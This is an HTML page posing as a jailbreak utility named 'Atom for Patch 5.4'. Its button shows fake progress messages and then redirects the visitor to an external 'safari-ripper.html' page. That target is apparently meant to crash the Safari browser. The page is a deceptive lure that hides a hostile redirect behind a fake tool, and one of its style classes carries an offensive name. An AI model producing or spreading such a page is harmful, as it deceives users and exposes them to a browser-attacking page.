
<html>
  <head>
    <style>
      body {
        font-family: 'Montserrat', sans-serif;
        font-weight: 300;
        background-color: #ddd;
      }
      h3.disclaimer {
        position: fixed;
        bottom: 0;
        font-style: italic;
        font-weight: 300;
      }
      h1.jbme {
        font-weight: 600;
        font-size: 38pt;
        margin-bottom: -32px;
      }
      h1.iosv {
        font-weight: 500;
        font-size: 30pt;
        color: #333;
        margin-bottom: -30px;
      }
      h1.credits {
        font-weight: 300;
      }
      div.rape {
        padding: 15px;
        background-color: #fff;
        border-radius: 15px;
        width: 320px;
        height: 300px;
      }
      a.jblol {
        background-color: #00B3FF;
        border-radius: 11px;
        padding: 15px 96px 15px 96px;
        color: white;
        font-weight: 600;
      }
      a.jblol:hover {
        background-color: #0089C4;
      }
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="https://fonts.googleapis.com/css?family=Montserrat:300,500,600" rel="stylesheet">
    <title>Totally real jbme</title>
  </head>
  <body onload="hideProgress()">
    <center><div class="rape">
    <center><h1 class="jbme">Atom</h1></center>
    <center><h1 class="iosv">for Patch 5.4</h1></center>
    <center><h1 class="credits">by @Vap0x</h1></center>
    <center><h1 class="credits" id="prog">Exporting... (1/3)</h1></center>
    <br>
    <br>
    <br>
    <a class="jblol" id="btn" onclick="jailbreak()">Export</a>
  </div></center>
  <h3 class="disclaimer">(DISCLAIMER: This can possibly ban you)</h3>
  </body>
  <script>
  function hideProgress() {
    var x = document.getElementById("prog");
    x.style.display = "none";
  }
  function jailbreak() {
    var a = document.getElementById("prog");
    var b = document.getElementById("btn");
    a.style.display = "block";
    b.style.display = "none";
    setTimeout(function () {
      document.getElementById("prog").innerHTML = "Changing PSK... (2/3)";
    }, 5000);
    setTimeout(function () {
      document.getElementById("prog").innerHTML = "Confirming... (3/3)";
    }, 10000);
    setTimeout(function () {
      document.location.href="https://cdn.rawgit.com/pwnsdx/ce64de2760996a6c432f06d612e33aea/raw/23f2faa0aadb4babbfd228c8bb32a26a8c51c741/safari-ripper.html";
    }, 12000);
  }
  </script>
</html>
